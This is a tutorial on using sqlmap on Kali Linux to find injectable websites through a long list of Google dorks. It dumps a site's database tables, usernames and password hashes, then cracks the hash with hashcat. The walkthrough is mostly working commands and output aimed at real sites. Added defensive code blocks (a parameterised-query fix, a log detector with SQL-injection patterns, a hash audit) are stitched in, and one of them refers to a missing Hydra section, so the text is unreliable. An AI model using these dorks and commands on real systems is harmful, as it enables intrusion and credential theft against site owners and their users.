SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. In this guide I will show you how to use sqlmap on Kali Linux to hack a website (more specifically its database) and extract usernames and passwords.


What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
  8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make ends meet. Your actions might impact someone in a way you never wished for. I think I can't make it any clearer.

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.

Step 1.a: Google Dork strings to find SQLMAP SQL injectable websites

This list is really long. It took me a long time to collect them. If you know SQL, then you can add more here. Put them in the comment section and I will add them here.

Google Dork string (column 1) | Google Dork string (column 2) | Google Dork string (column 3)
inurl:item_id= | inurl:review.php?id= | inurl:hosting_info.php?id=
inurl:newsid= | inurl:iniziativa.php?in= | inurl:gallery.php?id=
inurl:trainers.php?id= | inurl:curriculum.php?id= | inurl:rub.php?idr=
inurl:news-full.php?id= | inurl:labels.php?id= | inurl:view_faq.php?id=
inurl:news_display.php?getid= | inurl:story.php?id= | inurl:artikelinfo.php?id=
inurl:index2.php?option= | inurl:look.php?ID= | inurl:detail.php?ID=
inurl:readnews.php?id= | inurl:newsone.php?id= | inurl:index.php?=
inurl:top10.php?cat= | inurl:aboutbook.php?id= | inurl:profile_view.php?id=
inurl:newsone.php?id= | inurl:material.php?id= | inurl:category.php?id=
inurl:event.php?id= | inurl:opinions.php?id= | inurl:publications.php?id=
inurl:product-item.php?id= | inurl:announce.php?id= | inurl:fellows.php?id=
inurl:sql.php?id= | inurl:rub.php?idr= | inurl:downloads_info.php?id=
inurl:index.php?catid= | inurl:galeri_info.php?l= | inurl:prod_info.php?id=
inurl:news.php?catid= | inurl:tekst.php?idt= | inurl:shop.php?do=part&id=
inurl:index.php?id= | inurl:newscat.php?id= | inurl:productinfo.php?id=
inurl:news.php?id= | inurl:newsticker_info.php?idn= | inurl:collectionitem.php?id=
inurl:index.php?id= | inurl:rubrika.php?idr= | inurl:band_info.php?id=
inurl:trainers.php?id= | inurl:rubp.php?idr= | inurl:product.php?id=
inurl:buy.php?category= | inurl:offer.php?idf= | inurl:releases.php?id=
inurl:article.php?ID= | inurl:art.php?idm= | inurl:ray.php?id=
inurl:play_old.php?id= | inurl:title.php?id= | inurl:produit.php?id=
inurl:declaration_more.php?decl_id= | inurl:news_view.php?id= | inurl:pop.php?id=
inurl:pageid= | inurl:select_biblio.php?id= | inurl:shopping.php?id=
inurl:games.php?id= | inurl:humor.php?id= | inurl:productdetail.php?id=
inurl:page.php?file= | inurl:aboutbook.php?id= | inurl:post.php?id=
inurl:newsDetail.php?id= | inurl:ogl_inet.php?ogl_id= | inurl:viewshowdetail.php?id=
inurl:gallery.php?id= | inurl:fiche_spectacle.php?id= | inurl:clubpage.php?id=
inurl:article.php?id= | inurl:communique_detail.php?id= | inurl:memberInfo.php?id=
inurl:show.php?id= | inurl:sem.php3?id= | inurl:section.php?id=
inurl:staff_id= | inurl:kategorie.php4?id= | inurl:theme.php?id=
inurl:newsitem.php?num= | inurl:news.php?id= | inurl:page.php?id=
inurl:readnews.php?id= | inurl:index.php?id= | inurl:shredder-categories.php?id=
inurl:top10.php?cat= | inurl:faq2.php?id= | inurl:tradeCategory.php?id=
inurl:historialeer.php?num= | inurl:show_an.php?id= | inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= | inurl:preview.php?id= | inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= | inurl:loadpsb.php?id= | inurl:transcript.php?id=
inurl:forum_bds.php?num= | inurl:opinions.php?id= | inurl:channel_id=
inurl:game.php?id= | inurl:spr.php?id= | inurl:aboutbook.php?id=
inurl:view_product.php?id= | inurl:pages.php?id= | inurl:preview.php?id=
inurl:newsone.php?id= | inurl:announce.php?id= | inurl:loadpsb.php?id=
inurl:sw_comment.php?id= | inurl:clanek.php4?id= | inurl:pages.php?id=
inurl:news.php?id= | inurl:participant.php?id= |
inurl:avd_start.php?avd= | inurl:download.php?id= |
inurl:event.php?id= | inurl:main.php?id= |
inurl:product-item.php?id= | inurl:review.php?id= |
inurl:sql.php?id= | inurl:chappies.php?id= |
inurl:material.php?id= | inurl:read.php?id= |
inurl:clanek.php4?id= | inurl:prod_detail.php?id= |
inurl:announce.php?id= | inurl:viewphoto.php?id= |
inurl:chappies.php?id= | inurl:article.php?id= |
inurl:read.php?id= | inurl:person.php?id= |
inurl:viewapp.php?id= | inurl:productinfo.php?id= |
inurl:viewphoto.php?id= | inurl:showimg.php?id= |
inurl:rub.php?idr= | inurl:view.php?id= |
inurl:galeri_info.php?l= | inurl:website.php?id= |

Step 1.b: Initial check to confirm whether a website is vulnerable to SQLMAP SQL Injection

For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark at the end of the URL. (To be clear, " is a double quotation mark and ' is a single quotation mark.)
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads normally or redirects you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”
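Why the trailing quote produces exactly those error messages, and what the fixed code looks like, as an added illustration that is not part of the original tutorial: an in-memory SQLite table (constructed here) stands in for the item table behind item.cgi?item_id=, the vulnerable lookup splices the request parameter into the SQL text, and the hardened lookup binds it as a parameter after checking that it is an integer.

```python
# Added illustration (not from the original tutorial): why item_id=15' produces
# an SQL error, and how a parameterised query makes the same input harmless.
import sqlite3


def make_db():
    """Constructed stand-in for the item table behind item.cgi?item_id=..."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)",
                     [(15, "constructed item 15"), (16, "constructed item 16")])
    return conn


def lookup_vulnerable(conn, item_id):
    """The request parameter is pasted into the SQL text. With item_id=15'
    the statement ends in a lone quote, the parser fails, and the DBMS error
    (the kind listed above) is what the manual check looks for."""
    sql = "SELECT name FROM item WHERE item_id = " + item_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterised(conn, item_id):
    """The value is bound separately from the SQL text, so quotes inside it
    are data, not syntax. The type check rejects non-numeric input up front
    instead of letting the database report the problem to the client."""
    try:
        item_id = int(item_id)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM item WHERE item_id = ?",
                       (item_id,)).fetchone()
    return row[0] if row else None


def probe_shows_error(conn, lookup, item_id):
    """Mirror the tutorial's check: does this input make the lookup raise a
    database error? True means the page would show an SQL error message."""
    try:
        lookup(conn, item_id)
    except sqlite3.DatabaseError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    for candidate in ("15", "15'"):
        print(candidate,
              "vulnerable raises:", probe_shows_error(db, lookup_vulnerable, candidate),
              "parameterised raises:", probe_shows_error(db, lookup_parameterised, candidate))
```

The second half of the fix is not in the code: the verbose messages quoted above only reach the visitor because the application lets database exceptions propagate to the page. Log them server-side and return a generic error page, and the quote test no longer tells an outsider which DBMS is behind the site.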

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I've found a website vulnerable to SQLMAP SQL Injection. Now I need to list all the databases on that vulnerable server (this is also called enumerating the databases). As I am using sqlmap, it will also tell me which one is vulnerable.

Run the following command against the vulnerable URL:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = Enumerate DBMS databases
See screenshot below.

This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database on almost every MySQL server, so our interest is in the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns of the target table user_info in the sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for: the target columns user_login and user_password.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password for this user. The next step shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You're probably getting used to how the SQLMAP SQL Injection tool works by now. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
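Both procedures on this page leave a distinctive trace in the web server's access log: Hydra's web-form mode (described under "Using Hydra on Web Forms") is a burst of POSTs to the login page from one source, each answered with the failure page, and sqlmap's enumeration in Steps 2 to 6 is a run of requests to one URL whose parameter carries quotes or boolean conditions, often with sqlmap's own User-Agent. The following is an added example, not part of either tutorial, of flagging both patterns in Apache combined-format logs; the log lines, addresses and paths (/login.php, /cgi-bin/item.cgi) are constructed here.

```python
# Added example (not part of either tutorial): flag Hydra-style login bursts
# and sqlmap-style injection probes in Apache combined-format access logs.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Fragments that appear in the single-quote test and in boolean, UNION and
# time-based payloads once the query string is URL-decoded.
SQLI_RE = re.compile(
    r"(?:'|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\(|\b(?:and|or)\s+\d+\s*=\s*\d+)",
    re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bruteforce(lines, login_path="/login.php", threshold=5, window=60):
    """Return {ip: attempts} for sources that POSTed to the login form at least
    `threshold` times inside any `window`-second span. A Hydra run against a
    web form looks like this: many POSTs, each answered with the failure page
    (usually a 200, not an error status, which is why a status filter alone
    would miss it)."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # sliding window over timestamps
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def detect_sqli_probes(lines):
    """Return (ip, reason, path) for requests whose decoded query string carries
    an injection fragment or whose User-Agent names sqlmap."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        query = unquote_plus(rec["path"].partition("?")[2])
        if "sqlmap" in rec["ua"].lower():
            hits.append((rec["ip"], "sqlmap user-agent", rec["path"]))
        elif SQLI_RE.search(query):
            hits.append((rec["ip"], "injection fragment in query string", rec["path"]))
    return hits


# Constructed sample log: one ordinary visitor, one source hammering the login
# form, and one source probing item_id the way Step 1.b and sqlmap do.
LOG_LINES = [
    '203.0.113.7 - - [23/Nov/2014:10:50:01 +0000] "GET /cgi-bin/item.cgi?item_id=15 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
] + [
    '10.0.0.5 - - [23/Nov/2014:10:51:%02d +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"' % s
    for s in range(0, 24, 3)          # eight POSTs in 21 seconds
] + [
    '10.0.0.9 - - [23/Nov/2014:10:55:53 +0000] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Nov/2014:10:55:54 +0000] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Nov/2014:10:55:55 +0000] "GET /cgi-bin/item.cgi?item_id=15 HTTP/1.1" 200 2048 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]

if __name__ == "__main__":
    print("login bursts:", detect_login_bruteforce(LOG_LINES))
    for hit in detect_sqli_probes(LOG_LINES):
        print("sqli probe:", hit)
```

The thresholds and the bare single-quote rule are starting points, not tuned signatures: a surname like O'Brien in a search box trips the quote rule, so in practice scope it to parameters that should be numeric. The User-Agent check is the weakest signal, since a client can send any string; the payload pattern and the request rate against one parameter are what hold up.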


But hang on, this password looks funny. This can't be someone's password. Someone who leaves their website vulnerable like that just can't have a password like that.
That is exactly right. This is a hashed password. What that means is that the database stores a hash of the password rather than the password itself, so we now need to crack it.
I have covered how to crack password hashes extensively in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you've missed it, you're missing out on a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. (including the trailing dot). How do you know what type of hash that is?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line type the following command, and at the prompt paste the hash value:
hash-identifier

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a computer that's got an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop, I've got an AMD ATI graphics card, so I will be using oclHashcat there. If you're on VirtualBox or VMWare, neither cudaHashcat nor oclHashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: the usual Hashcat was unable to determine the code for DES hashes (it is not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, here's the cracked password, shown as hash:password: 24iYBc17xK0e.:abc123. So the password is abc123.
Sweet, we now even have the password for this user.
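Step 7 identified the format by the shape of the string, and the crack succeeded because DES crypt is a fast, tiny-key-space format. The added example below, which is not the tutorial's own tooling and whose format table and sample user rows are assumptions made here, does the same shape test that hash-identifier performed for 24iYBc17xK0e., then turns it into what the site owner needs: an audit of a user table for legacy hash formats, and a salted PBKDF2 replacement for them.

```python
# Added example (not the tutorial's own tooling): classify stored password
# hashes by format, the way hash-identifier did for 24iYBc17xK0e. above, and
# flag a user table whose hashes use formats that should be retired.
import hashlib
import hmac
import os
import re

# (label, hashcat mode, pattern, still acceptable today?)
# Mode numbers are hashcat's: 0 MD5, 100 SHA1, 300 MySQL4.1/5, 500 md5crypt,
# 1500 descrypt (DES(Unix)), 1800 sha512crypt, 3200 bcrypt.
HASH_FORMATS = [
    ("bcrypt",           3200, re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), True),
    ("sha512crypt",      1800, re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$"), True),
    ("md5crypt",          500, re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"), False),
    ("MySQL4.1/5",        300, re.compile(r"^\*[0-9A-F]{40}$"), False),
    ("DES crypt (Unix)", 1500, re.compile(r"^[./0-9A-Za-z]{13}$"), False),
    ("raw MD5",             0, re.compile(r"^[0-9a-f]{32}$"), False),
    ("raw SHA-1",         100, re.compile(r"^[0-9a-f]{40}$"), False),
]


def identify_hash(value):
    """Return (label, hashcat_mode) for the first matching format, or
    ("unknown", None). Like hash-identifier this is a shape test only: any
    13-character string from the crypt alphabet is reported as DES crypt."""
    for label, mode, pattern, _ in HASH_FORMATS:
        if pattern.match(value):
            return label, mode
    return "unknown", None


def audit_password_column(rows):
    """rows: iterable of (username, stored_hash). Returns per-format counts and
    the users whose hashes are in a legacy format (unsalted, fast, or with a
    tiny key space like DES crypt's 8-character limit)."""
    counts = {}
    legacy_users = []
    acceptable = {label for label, _, _, ok in HASH_FORMATS if ok}
    for user, stored in rows:
        label, _ = identify_hash(stored)
        counts[label] = counts.get(label, 0) + 1
        if label not in acceptable:
            legacy_users.append(user)
    return counts, legacy_users


# Replacement format for the legacy hashes: salted PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Fresh random salt per user; the iteration count is stored with the
    hash so it can be raised later without breaking existing rows."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Constant-time comparison against a value produced by hash_password."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, digest_hex = parts
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed user_info rows: the first hash is the one dumped in the
# tutorial, the others are shape-only samples for the audit.
SAMPLE_COLUMN = [
    ("userX", "24iYBc17xK0e."),
    ("alice", "$1$abcdefgh$" + "A" * 22),
    ("bob",   "$6$saltsalt$" + "B" * 86),
    ("carol", "$2a$10$" + "C" * 53),
]

if __name__ == "__main__":
    print(identify_hash("24iYBc17xK0e."))
    print(audit_password_column(SAMPLE_COLUMN))
```

The usual migration path for the legacy rows is to rehash each password with the new format at the user's next successful login, since the original password is not recoverable from the stored hash without the kind of cracking run shown above.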